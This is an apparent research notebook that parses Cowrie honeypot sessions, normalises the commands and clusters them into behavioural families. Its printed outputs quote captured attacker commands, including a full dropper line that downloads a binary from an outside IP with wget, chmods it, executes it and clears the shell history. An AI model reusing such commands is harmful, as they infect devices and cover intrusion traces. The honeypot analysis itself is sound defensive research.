# Functional Similarity (FS): End-to-End Pipeline

This notebook shows the full FS pipeline for a single dataset (here: `Cowrie.csv`),
**building on top of the FI results**.

The steps are:

1. Set up the project root and import the `fi_fs` module.
2. Run the FI bootstrap (or load the FI table) to obtain FI-unique archetypes.
3. Build a mapping from `fi_hash → canonical sequence` for these archetypes.
4. Compute pairwise FS scores between archetypes using a structural
   Levenshtein-style comparator.
5. Save the FS matrix for reuse (e.g. clustering, evaluation).
6. Cluster archetypes into FS-based families and inspect their summaries
   (sizes, medoids, consensus structure).

The goal is to make it easy to see **what FS does** from start to finish,
given FI-unique archetypes as input.


In [1]:
# Bootstrap project root + Python path
import sys, subprocess
from pathlib import Path
import json
import numpy as np
import pandas as pd

import fi_fs

ROOT = Path(subprocess.check_output(
    ["git", "rev-parse", "--show-toplevel"],
    text=True,
).strip())

sys.path[:0] = [str(ROOT / "src")]
print("ROOT project:", ROOT.name)

# FI pipeline pieces

from fi_fs import (
    # FI core
    load_aggregated_csv,
    parse_dataframe_to_triplets,
    apply_aliases,
    apply_placeholders_args_only,
    assert_connectors_preserved,
    alpha_renumber,
    assert_serialisation_deterministic,
    build_fi_dataframe,
    load_alias_map_yaml,

    # FS core
    build_archetypes,
    fs_levenshtein_structural,
    agglomerative_from_fs,
    evaluate_fs_clustering,
    group_indices_from_labels,
    medoid_indices,

    # FS families + visuals
    parse_structured_tokens,
    sankey_from_family_enhanced,

    # Utils (colouring)
    build_fi_colour_map,
    colour_text,
)



PYTHON: cpython 3.12.0
BASHLEX: 0.18
ROOT project: PhD


## Step 1 - FI bootstrap for FS (parse → normalise → FI table)

FS works **on top of** the FI-unique archetypes, so we first (re)run the FI
pipeline for the chosen dataset:

1. **Load aggregated sessions** from `projects/fi_fs/data/processed/<dataset>.csv`.
2. **Parse** each session’s command string with `bashlex` into ordered
   `(op, args, conn)` triplets.
3. **Normalise** the sequences:
   - apply the alias map (canonical operators),
   - replace literals with typed placeholders,
   - α-renumber placeholders for deterministic naming.
4. **Build the FI table**, adding a canonical JSON representation and
   an `fi_hash` (class ID) for each session.

The resulting `fi_df` dataframe is the starting point for FS: it tells us how
many sessions there are in total and how many **FI-unique** behavioural
archetypes we will compare with FS.


In [2]:
# FI bootstrap for FS: parse → normalise → FI table

DATASET = "Cowrie.csv"
INPUT = ROOT / "projects" / "fi_fs" / "data" / "processed" / DATASET

agg, stats = load_aggregated_csv(str(INPUT))
print(f"\n--- FI bootstrap for FS ---")
print(f"Dataset: {INPUT.relative_to(ROOT)}")
print(f"Aggregated sessions: {stats['n_sessions']}")

# 1) bashlex → triplets
seqs, parsed_parts, parse_df, problems = parse_dataframe_to_triplets(
    agg,
    progress=True,
    with_diagnostics=True,
)
print(f"Parsed sequences: {len(seqs)}")

# 2) normalisation: aliases → placeholders → α-renumber
alias_map_path = ROOT / "src" / "fi_fs" / "resources" / "alias_map.yaml"
alias_map = load_alias_map_yaml(alias_map_path)
seqs_alias, alias_changes = apply_aliases(seqs, alias_map)
print("Alias changes:", 0 if alias_changes is None else len(alias_changes))

seqs_ph, dbg = apply_placeholders_args_only(
    seqs_alias,
    debug=True,
    preview_changed_first_n_sessions=5,
    sample_per_reason=5,
)
assert_connectors_preserved(seqs_alias, seqs_ph)
seqs_alpha = alpha_renumber(seqs_ph, check_idempotent=True)
print("α-renumbered sessions:", len(seqs_alpha))

# 3) FI table
assert_serialisation_deterministic(seqs_alpha)
fi_df = build_fi_dataframe(agg, seqs_alpha, commands_col="commands_joined")
print(f"Sessions total: {len(fi_df)} | FI-unique: {fi_df['fi_hash'].nunique()}")

fi_df.head(5)



--- FI bootstrap for FS ---
Dataset: projects/fi_fs/data/processed/Cowrie.csv
Aggregated sessions: 63039


Parsing sessions (bashlex): 100%|██████████| 63039/63039 [00:44<00:00, 1416.91it/s]


Parsed sequences: 63039
Alias changes: 163
α-renumbered sessions: 63039
Sessions total: 63039 | FI-unique: 418


Unnamed: 0,session,n_rows,fi_hash,commands_clean,canonical_json
0,00031aeff1a6,5,9c07a2ac9b0db760,sh\nshell\nenable\necho 'nameserver 95.214.27....,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
1,0003e7887230,5,9c07a2ac9b0db760,sh\nshell\nenable\necho 'nameserver 95.214.27....,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
2,0003f10a2103,4,ec2785b8610be5a7,sh\nshell\nenable\ncat /bin/echo || while read...,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
3,0009b3b635ed,1,a34d629a02c11268,cat /bin/echo,"[[""cat"",[""PH_PATH_1""],""EOS""]]"
4,000b5a1e7c5f,1,a5b2e002ac0fcb8a,echo -e '\\x67\\x61\\x79\\x66\\x67\\x74',"[[""echo"",[""-e"",""PH_HEXDATA""],""EOS""]]"


## Step 2 - Build `fi_hash → canonical sequence` map for FS

Next, we construct a mapping from each **FI class** to its canonical
execution sequence:

- `build_archetypes(fi_df)` groups sessions by `fi_hash`,
- selects the canonical sequence for each FI class, and
- returns a dictionary: `fi_hash → [(op, args, conn), ...]`.

This `arche_map` is the input to FS: it tells us *which* behaviour each
FI-unique archetype represents, in a form that the FS comparator can work on.


In [3]:
# Cell 3 - build fi_hash -> triplets map for FS

# Map fi_hash -> triplets (canonical sequences)
arche_map = build_archetypes(fi_df)
print("FI-unique archetypes (by fi_hash):", len(arche_map))


FI-unique archetypes (by fi_hash): 418


## Step 3 - Compute and save the FS matrix (structural Levenshtein)

Using the FI-unique archetypes (`arche_map`), we now:

1. **Compute pairwise FS scores** with a structural Levenshtein-style
   comparator:
   - operates on canonical `(op, args, conn)` triplets,
   - is order-aware and can optionally include connectors in the comparison.

2. **Inspect basic sanity stats** (mean/median/min/max of off-diagonal FS
   values) to check the spread of similarities.

3. **Save the FS matrix** to disk as:

   `projects/fi_fs/data/output/<dataset_name>/FS_eval/<dataset_name>_FS_Lev_opconn_N{N}.npy`

   where `N` is the number of FI-unique archetypes.
   This `.npy` file can then be reused by clustering/evaluation notebooks
   without recomputing FS.


In [4]:
from pathlib import Path as _Path

N = len(arche_map)
print(f"Computing structural Levenshtein FS over N={N} FI-unique archetypes...")

labels_lev, FS_lev = fs_levenshtein_structural(
    arche_map,
    include_connectors=True,
    progress=True,
)

# Sanity stats (off-diagonal only)
tri = FS_lev[np.triu_indices_from(FS_lev, 1)]
print(
    f"FS (off-diagonal): n={tri.size}, "
    f"mean={tri.mean():.3f}, median={np.median(tri):.3f}, "
    f"min={tri.min():.3f}, max={tri.max():.3f}"
)

# Output path: data/output/<dataset_name>/FS_eval/<dataset_name>_FS_Lev_opconn_N{N}.npy
DATASET_NAME = _Path(DATASET).stem
fs_dir = ROOT / "projects" / "fi_fs" / "data" / "output" / DATASET_NAME / "FS_eval" / "NumPy_Arrays"
fs_dir.mkdir(parents=True, exist_ok=True)

fs_filename = f"{DATASET_NAME}_FS_Lev_opconn_N{FS_lev.shape[0]}.npy"
fs_path = fs_dir / fs_filename
np.save(fs_path, FS_lev)

print("Saved FS array to:", fs_path.relative_to(ROOT))


Computing structural Levenshtein FS over N=418 FI-unique archetypes...


Levenshtein-struct (rows):   0%|          | 0/418 [00:00<?, ?it/s]

Levenshtein-struct (pairs):   0%|          | 0/87153 [00:00<?, ?it/s]

FS (off-diagonal): n=87153, mean=0.183, median=0.141, min=0.002, max=1.000
Saved FS array to: projects/fi_fs/data/output/Cowrie/FS_eval/NumPy_Arrays/Cowrie_FS_Lev_opconn_N418.npy


## Step 4 - Align archetypes to FS matrix order

The FS matrix `FS_lev` is indexed in the order returned by the FS
comparator (`labels_lev`, a list of `fi_hash` values).

To make later analysis easier, we:

1. Rebuild the FI-unique representatives (one row per `fi_hash`), choosing
   the longest `n_rows` per class as before.
2. **Reindex** this table using `labels_lev` so that rows line up exactly
   with the rows/columns of `FS_lev`.
3. Decode `canonical_json` into explicit `(op, args, conn)` sequences and
   store them in a `seq` column.

The resulting `archetypes` dataframe (plus `seqs_unique` and `fi_hashes`)
is now perfectly aligned to the FS matrix and ready for clustering and
family-level analysis.


In [5]:
# Align FI-unique archetypes to FS_lev order (labels_lev)

def decode_canonical(canon_json: str):
    rows = json.loads(canon_json)
    return [(op, tuple(args), conn) for op, args, conn in rows]


# Build FI-unique representatives as before, then reindex by labels_lev
archetypes = (
    fi_df.sort_values(["n_rows", "session"], ascending=[False, True])
         .drop_duplicates("fi_hash", keep="first")
         .set_index("fi_hash")
         .loc[labels_lev]                     # align rows to FS_lev order
         .reset_index()                       # fi_hash back as a column
         [["fi_hash", "session", "n_rows", "canonical_json"]]
)

archetypes["seq"] = archetypes["canonical_json"].map(decode_canonical)

# Convenience globals in FS_lev row order
seqs_unique = archetypes["seq"].tolist()
fi_hashes   = archetypes["fi_hash"].tolist()

print(f"Aligned archetypes to FS matrix order. Rows: {len(archetypes)}")
display(archetypes.head(5))


Aligned archetypes to FS matrix order. Rows: 418


Unnamed: 0,fi_hash,session,n_rows,canonical_json,seq
0,0014c5294a1b8182,b898ce35a477,5,"[[""curl"",[""PH_URL_1""],""|""],[""sudo"",[""python3"",...","[(curl, (PH_URL_1,), |), (sudo, (python3, -, -..."
1,0129d0d0e783bb89,60a7ef53c929,1,"[[""cd"",[""PH_PATH_1""],"";""],[""wget"",[""PH_URL_1""]...","[(cd, (PH_PATH_1,), ;), (wget, (PH_URL_1,), ;)..."
2,021cda85adade07c,1474808cc7d5,1,"[[""rm"",[""-rf"",""PH_PATH_1""],"";""],[""wget"",[""PH_U...","[(rm, (-rf, PH_PATH_1), ;), (wget, (PH_URL_1, ..."
3,02661ba640ad5dbe,0ca5aa140689,1,"[[""cd"",[""PH_PATH_1""],""||""],[""cd"",[""PH_PATH_2""]...","[(cd, (PH_PATH_1,), ||), (cd, (PH_PATH_2,), ||..."
4,02bf42b5f10bf742,69db926faa9d,5,"[[""mkdir"",[""PH_PATH_1""],"";""],[""mount"",[""-o"",""r...","[(mkdir, (PH_PATH_1,), ;), (mount, (-o, remoun..."


## Step 5 - Cluster archetypes into FS families (Agglomerative)

With the FS matrix `FS_lev` in hand, we now cluster the FI-unique
archetypes into **FS families** using Agglomerative clustering:

- The threshold `tau` controls how similar items must be to join a family.
- `agglomerative_from_fs` returns a cluster label per archetype.
- `evaluate_fs_clustering` reports basic summary stats (number of families,
  singletons, etc.).

The resulting labels are stored in `archetypes["family_agg"]` and will be
used for family-level summaries and visualisations.


In [6]:
# Cluster FS matrix into families (Agglomerative @ tau)

# FS threshold pre-set from FS_Eval notebook experiments
# Adjust accordingly if needed
TAU = 0.75

labels_agg = agglomerative_from_fs(FS_lev, tau=TAU)
archetypes["family_agg"] = labels_agg

stats = evaluate_fs_clustering(
    FS_lev,
    labels_agg,
    tau=TAU,
)

print(f"FS Agglomerative clustering @ tau={TAU}")
print("Families discovered:", stats["n_clusters"])
print("Singleton families:", stats["n_singletons"])

print("\nFamily size distribution (top 10):")
display(pd.Series(labels_agg).value_counts().head(10))

print("\nInternal metrics:")
display(pd.DataFrame([stats]))


FS Agglomerative clustering @ tau=0.75
Families discovered: 188
Singleton families: 110

Family size distribution (top 10):


6      15
35     13
80     13
15     11
68     10
87      9
20      8
34      8
126     7
16      7
Name: count, dtype: int64


Internal metrics:


Unnamed: 0,config,tau,N,n_clusters,n_singletons,max_cluster_size,median_cluster_size,cohesion_min_FS,cohesion_mean_FS,silhouette,calinski_harabasz,davies_bouldin,dunn
0,,0.75,418,188,110,15,1.0,0.666667,0.909371,0.476551,121.550966,0.406154,0.352941


In [7]:
# Optional: explicit groups + medoids from cluster labels

groups = group_indices_from_labels(labels_agg)
medoids = medoid_indices(FS_lev, groups)

print(f"Clusters: {len(groups)}")
print("Example cluster → members (first 5 clusters):")
for gid in sorted(groups.keys())[:5]:
    print(f"  Cluster {gid}: indices {groups[gid][:10]}{' ...' if len(groups[gid]) > 10 else ''}")

print("\nMedoid indices per cluster (first 5):")
for gid in sorted(medoids.keys())[:5]:
    print(f"  Cluster {gid}: medoid index {medoids[gid]}")


Clusters: 188
Example cluster → members (first 5 clusters):
  Cluster 0: indices [286, 316, 358]
  Cluster 1: indices [64, 259, 298, 337]
  Cluster 2: indices [47, 93, 202, 352]
  Cluster 3: indices [113, 225, 271, 330]
  Cluster 4: indices [41, 44, 45, 150, 171, 410]

Medoid indices per cluster (first 5):
  Cluster 0: medoid index 358
  Cluster 1: medoid index 64
  Cluster 2: medoid index 47
  Cluster 3: medoid index 113
  Cluster 4: medoid index 41


## Step 6 - Summarise FS families and members

With cluster labels assigned (`labels_agg`), we now build:

1. **Family-level summaries** via `summarise_families`:
   - one row per FS family,
   - size and basic FS statistics (mean / sd),
   - the medoid index and its `fi_hash`,
   - simple descriptive features such as `top_ops` and
     `consensus_skeleton_pairs`.

2. A **family members table** via `build_family_members_df`:
   - one row per FI-unique archetype,
   - includes its `family_id`, `fi_hash`, and basic metadata.

These two tables (`summ_df` and `family_members_df`) support downstream
inspection, reporting, and visualisation of FS-based behavioural families.


In [8]:
# Summarise FS families and build member table

from fi_fs.fs_families import summarise_families, build_family_members_df

# Sanity checks (optional but nice when running standalone)
for name in ["archetypes", "seqs_unique", "FS_lev", "labels_agg"]:
    if name not in globals():
        raise RuntimeError(f"Expected '{name}' to be defined before this cell.")

fi_hashes = archetypes["fi_hash"].tolist()  # aligned with FS_lev rows

# 1) Per-family summaries
summ_df, family_groups, medoids = summarise_families(
    FS=FS_lev,
    seqs_unique=seqs_unique,
    labels=labels_agg,
    fi_hashes=fi_hashes,
)

cols = [
    "family_id",
    "size",
    "mean_FS",
    "sd_FS",
    "medoid_idx",
    "medoid_fi_hash",
    "top_ops",
    "consensus_skeleton_pairs",
]

n_singletons = int((summ_df["size"] == 1).sum())
print(f"\nFamilies total: {len(summ_df)} | Singleton families: {n_singletons}")
print("\nFamily summaries (top 10 by size, then mean_FS):")
display(summ_df[cols].head(10))

# 2) Family members table (one row per archetype with its family label)
family_members_df = build_family_members_df(
    archetypes=archetypes,
    labels=labels_agg,
)

print(
    f"\nfamily_members_df: {len(family_members_df)} rows across "
    f"{family_members_df['family_id'].nunique()} families"
)
display(family_members_df.head(5))



Families total: 188 | Singleton families: 110

Family summaries (top 10 by size, then mean_FS):


Unnamed: 0,family_id,size,mean_FS,sd_FS,medoid_idx,medoid_fi_hash,top_ops,consensus_skeleton_pairs
0,6,15,0.8656,0.0977,27,0e2f33f329730941,"[(cd, 69), (sh, 56), (chmod, 45), (tftp, 30), ...","[(cd, ||), (cd, ||), (cd, ;), (wget, ;), (chmo..."
1,35,13,1.0,0.0,38,153fd69fc12292c2,"[(echo, 13)]","[(echo, EOS)]"
2,80,13,0.9191,0.035,30,0fbbb73a992a1549,"[(cp, 324), (chmod, 228), (cd, 133), (rm, 121)...","[(cd, &&), (rm, &&), (mkdir, &&), (echo, &&), ..."
3,15,11,0.8561,0.0833,336,d23cce656fcbd960,"[(cp, 279), (chmod, 191), (cd, 103), (>, 99), ...","[(mkdir, ;), (mount, ;), (cp, &&), (>, &&), (c..."
4,68,10,1.0,0.0,34,137a14b5e9787ebc,"[(busybox, 10)]","[(busybox, EOS)]"
5,87,9,0.9655,0.0278,187,7fef9be56d5dd1a7,"[(echo, 575), (rm, 63), (chmod, 27), (tftp, 18...","[(enable, ;), (system, ;), (shell, ;), (sh, ;)..."
6,20,8,0.9033,0.0571,73,2b5150c23e9a475b,"[(cd, 40), (cat, 16), (chmod, 12), (wget, 8), ...","[(cat, ;), (cd, ||), (cd, ||), (cd, ||), (cd, ..."
7,34,8,0.8932,0.0644,287,b45528be915a36a4,"[(echo, 40), (>, 24), (rm, 19), (cp, 16), (wge...","[(cat, ;), (rm, ;), (rm, ;), (>, ;), (chmod, |..."
8,56,7,0.9522,0.0321,51,1dcdd0685e28acdb,"[(rm, 25), (tftp, 14), (enable, 7), (system, 7...","[(enable, ;), (system, ;), (shell, ;), (sh, ;)..."
9,126,7,0.9109,0.0516,263,a94b10e419c5761d,"[(echo, 106), (>, 97), (cd, 97), (PH_EXEC_1, 9...","[(>, &&), (cd, ;), (echo, ||), (PH_EXEC_1, ;),..."



family_members_df: 418 rows across 188 families


Unnamed: 0,family_id,archetype_idx,fi_hash,session,n_rows,struct_tokens
0,140,0,0014c5294a1b8182,b898ce35a477,5,"[[""curl"",[""PH_URL_1""],""|""],[""sudo"",[""python3"",..."
1,16,1,0129d0d0e783bb89,60a7ef53c929,1,"[[""cd"",[""PH_PATH_1""],"";""],[""wget"",[""PH_URL_1""]..."
2,18,2,021cda85adade07c,1474808cc7d5,1,"[[""rm"",[""-rf"",""PH_PATH_1""],"";""],[""wget"",[""PH_U..."
3,44,3,02661ba640ad5dbe,0ca5aa140689,1,"[[""cd"",[""PH_PATH_1""],""||""],[""cd"",[""PH_PATH_2""]..."
4,43,4,02bf42b5f10bf742,69db926faa9d,5,"[[""mkdir"",[""PH_PATH_1""],"";""],[""mount"",[""-o"",""r..."


## Step 7 - Export an FS families Markdown report

To make the FS results easy to browse outside the notebook, we generate a
Markdown report with one section per FS family:

- Families are ordered by **size** (largest first), then by **mean_FS**.
- For each family we record:
  - the family ID,
  - size, mean_FS, and sd_FS,
  - the medoid archetype (`fi_hash`, session id, `n_rows`),
  - the consensus `(op, conn)` skeleton,
  - the top operators observed in the family.

We also list up to the first 12 member archetypes (with `fi_hash`,
`session`, and `n_rows`) for a quick textual overview.

The report is written to:

`projects/fi_fs/data/processed/<dataset_name>_FS_families_report.md`

and can be opened directly in any Markdown viewer or included as an
appendix in documentation.


In [9]:
# Create a Markdown report with one section per family

from pathlib import Path as _Path

# Detect a commands column on fi_df for medoid snippet lookups
CMD_COL_CANDIDATES = ["commands_clean", "commands_joined", "commands"]
cmd_col = next((c for c in CMD_COL_CANDIDATES if c in fi_df.columns), None)
if cmd_col is None:
    raise KeyError(
        f"No commands column found in fi_df. "
        f"Looked for: {CMD_COL_CANDIDATES}. "
        f"Got: {list(fi_df.columns)}"
    )

lines = ["# FS Families Report\n"]
fam_order = (
    summ_df.sort_values(["size", "mean_FS"], ascending=[False, False])["family_id"]
           .tolist()
)

for fid in fam_order:
    row = summ_df.loc[summ_df["family_id"] == fid].iloc[0]
    idxs = family_groups[fid]
    medoid_idx = int(row["medoid_idx"])
    med = archetypes.iloc[medoid_idx]

    # Medoid look-up from fi_df (original FI table)
    med_sess = str(med.session)
    med_hash = med.fi_hash
    med_rows = fi_df.loc[
        (fi_df["session"].astype(str) == med_sess) &
        (fi_df["fi_hash"] == med_hash),
        cmd_col,
    ]

    if not med_rows.empty:
        med_cmds = str(med_rows.iloc[0])
        max_len = 260
        if len(med_cmds) > max_len:
            med_cmds_snippet = med_cmds[:max_len] + " ..."
        else:
            med_cmds_snippet = med_cmds
    else:
        med_cmds_snippet = "(commands not found in fi_df)"

    lines.append(
        f"## Family {fid}\n\n"
        f"Size: **{row['size']}**, mean_FS: **{row['mean_FS']:.3f}**, "
        f"sd_FS: **{row['sd_FS']:.3f}**  \n"
        f"Medoid: `fi_hash={med.fi_hash}` "
        f"(session `{med.session}`, n_rows={int(med.n_rows)})  \n\n"
        f"**Medoid commands (snippet):**\n\n"
        f"```bash\n{med_cmds_snippet}\n```\n\n"
        f"Consensus (op, conn) pairs:\n\n"
        f"```python\n{row['consensus_skeleton_pairs']}\n```\n\n"
        f"Top operators: {row['top_ops']}\n"
    )

    # Members as a proper Markdown table instead of a code block
    members = (
        archetypes.loc[idxs, ["fi_hash", "session", "n_rows"]]
        .head(5)
        .reset_index(drop=True)
    )
    members_md = members.to_markdown(index=False)

    lines.append("**Members (first 5):**\n\n" + members_md + "\n")

md_text = "\n".join(lines)

DATASET_NAME = _Path(DATASET).stem
report_dir = ROOT / "projects" / "fi_fs" / "data" / "output" / DATASET_NAME / "FS_eval"
report_dir.mkdir(parents=True, exist_ok=True)

report_path = report_dir / f"{DATASET_NAME}_FS_families_report.md"
with open(report_path, "w", encoding="utf-8") as f:
    f.write(md_text)

print("Wrote FS families report to:", report_path.relative_to(ROOT))


Wrote FS families report to: projects/fi_fs/data/output/Cowrie/FS_eval/Cowrie_FS_families_report.md


## Step 8 - Sankey visualisation for a chosen FS family

To get an intuitive view of **how** commands vary within a single FS family,
we can draw a Sankey diagram for one `family_id`:

1. Select a family (`FAM`) and collect its `struct_tokens` from
   `family_members_df`.
2. Decode these into structured sequences for all member archetypes.
3. Use `sankey_from_family_enhanced` to build a flow diagram where:
   - the backbone path reflects a consensus sequence (WLCS backbone),
   - branches represent common variants at different positions,
   - edge widths indicate how often each variant occurs.

The printed `variant_detail` data gives a textual breakdown of the same
information (variants per “gap”), complementing the visualisation.


In [10]:
# Sankey visualisation for a chosen FS family

import json
from pprint import pprint

FAM = 20

# 1) Pull family members' structured tokens
rows = family_members_df.loc[
    family_members_df["family_id"] == FAM,
    "struct_tokens",
]
if rows.empty:
    avail = sorted(family_members_df["family_id"].unique().tolist())
    raise ValueError(
        f"No members for family {FAM}. "
        f"Available family_ids (first 20): {avail[:20]}"
    )

family_seqs = [parse_structured_tokens(json.loads(s)) for s in rows]

# 2) Metadata for caption from summaries + archetypes
meta_row = summ_df.loc[summ_df["family_id"] == FAM].iloc[0]
medoid_idx = int(meta_row["medoid_idx"])
med = archetypes.iloc[medoid_idx]

caption = {
    "family_id": FAM,
    "n_sessions": len(family_seqs),
    "mean_FS": meta_row["mean_FS"],
    "sd_FS": meta_row["sd_FS"],
    "medoid_fi_hash": med["fi_hash"],
    "medoid_session": med["session"],
    "medoid_n_rows": int(med["n_rows"]),
    "top_ops": meta_row["top_ops"],
}

# 3) Build and show Sankey
fig, backbone, stats = sankey_from_family_enhanced(
    family_seqs,
    backbone=None,  # use WLCS backbone
    title=f"Family {FAM} — Sankey (WLCS backbone, structural FS)",
    min_variant_support=0.10,
    topN_variants_per_gap=3,
    variant_label_mode="first",
    normalise_widths=False,
    caption=caption,
)
fig.show()

print("Variant details by gap (k=0 is START→B0):")
pprint(stats["variant_detail"])


Variant details by gap (k=0 is START→B0):
{6: {'PH_EXEC_1 ;': 6, 'PH_EXEC_1 EOS': 1, 'sh ;': 1}}


## Step 9 - Inspect original sessions for a chosen FS family

FS families are defined over **FI-unique archetypes**, but each archetype
(`fi_hash`) can correspond to many original sessions. This cell lets us
“open up” one FS family and see all of its underlying sessions.

For a chosen `family_id` (`FAM`):

1. **Select FI classes in the family**  
   Use `archetypes["family_agg"]` to find all `fi_hash` values that belong
   to the chosen FS family.

2. **Expand back to original sessions**  
   Filter `fi_df` (one row per original session) to keep only those whose
   `fi_hash` is in that family. Detect a suitable commands column
   (`commands_clean`, `commands_joined`, or `commands`), and sort sessions
   by `fi_hash`, then `n_rows`, then `session`.

3. **Colour-map FI classes**  
   Build a stable mapping `fi_hash → colour` with `build_fi_colour_map`,
   and print a small legend showing how many sessions each FI class
   contributes.

4. **Pretty-print sessions grouped by FI class**  
   For each FI class in the family, print:
   - a group header (`FI class <fi_hash> — N sessions`), and  
   - each session’s `commands_clean`, colour-coded by `fi_hash`.

This makes it much easier to see, within a single FS family, which concrete
scripts belong to which FI-unique archetype, and how many times each
archetype appears in the raw data.


In [11]:
# Inspect commands for all original sessions in a given FS family

FAM = 20

# 1) FI classes (fi_hash) that belong to this FS family
if "family_agg" not in archetypes.columns:
    raise KeyError(
        "Expected 'family_agg' column on archetypes. "
        "Run the clustering cell before this one."
    )

fam_fi_hashes = (
    archetypes.loc[archetypes["family_agg"] == FAM, "fi_hash"]
    .astype(str)
    .unique()
    .tolist()
)
if not fam_fi_hashes:
    raise ValueError(f"No FI classes found for family {FAM} in 'family_agg'.")

# 2) Expand back to all original sessions via fi_df
subset = fi_df[fi_df["fi_hash"].astype(str).isin(fam_fi_hashes)].copy()

cmd_col = next(
    (c for c in ["commands_clean", "commands_joined", "commands"] if c in subset.columns),
    None,
)
if cmd_col is None:
    raise KeyError(
        "No commands column found in fi_df. "
        "Looked for: commands_clean / commands_joined / commands."
    )

subset = (
    subset.assign(session=lambda df: df["session"].astype(str))
          .loc[:, ["session", "n_rows", "fi_hash", cmd_col]]
          .rename(columns={cmd_col: "commands_clean"})
          .sort_values(["fi_hash", "n_rows", "session"], ascending=[True, False, True])
          .reset_index(drop=True)
)

n_sessions = len(subset)
unique_fi = subset["fi_hash"].unique().tolist()
fi_counts = subset["fi_hash"].value_counts().sort_index()

print(f"Family {FAM}: {n_sessions} original sessions")
print(f"Distinct FI classes in this family: {len(unique_fi)}")

# 3) Colour map and legend
fi_to_colour = build_fi_colour_map(unique_fi, seed=1)

print("\nFI-class legend (colour-coded):")
for fh in sorted(unique_fi):
    label = f"{fh} (sessions={fi_counts[fh]})"
    print("  ", colour_text(label, fh, fi_to_colour))

# 4) Detailed per-session printout
print("\n=== Per-session commands_clean (grouped by fi_hash) ===")
current_fi = None

for _, row in subset.iterrows():
    fh = row["fi_hash"]
    if fh != current_fi:
        current_fi = fh
        header = f"\n### FI class {fh} — {fi_counts[fh]} sessions"
        print(colour_text(header, fh, fi_to_colour))

    hdr = f"--- session {row['session']} | n_rows={row['n_rows']} | fi_hash={fh} ---"
    print(colour_text(hdr, fh, fi_to_colour))

    cmds = str(row["commands_clean"])
    pretty = cmds if "\n" in cmds else cmds.replace(" ; ", ";\n")
    print(colour_text(pretty, fh, fi_to_colour))


Family 20: 87 original sessions
Distinct FI classes in this family: 8

FI-class legend (colour-coded):
   [38;5;86m2b5150c23e9a475b (sessions=8)[0m
   [38;5;217m5132f82d03311d29 (sessions=35)[0m
   [38;5;62m69389df6348c3521 (sessions=8)[0m
   [38;5;132m69765b4232307f30 (sessions=9)[0m
   [38;5;82m7879301414703b7b (sessions=18)[0m
   [38;5;198m79bed62d9fd307a5 (sessions=2)[0m
   [38;5;186m980934c326711042 (sessions=3)[0m
   [38;5;191ma74c1abec6f558ea (sessions=4)[0m

=== Per-session commands_clean (grouped by fi_hash) ===
[38;5;86m
### FI class 2b5150c23e9a475b — 8 sessions[0m
[38;5;86m--- session 47d4dcea00e5 | n_rows=1 | fi_hash=2b5150c23e9a475b ---[0m
[38;5;86mcat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://46.19.141.122/bins/x86; cat x86 > snort; chmod 777 snort; chmod +x snort; ./snort rooted.x86; history -c[0m
[38;5;86m--- session 5455882fc087 | n_rows=1 | fi_hash=2b5150c23e9a475b ---[0m
[38;5;86mcat /etc/issue; cd /tm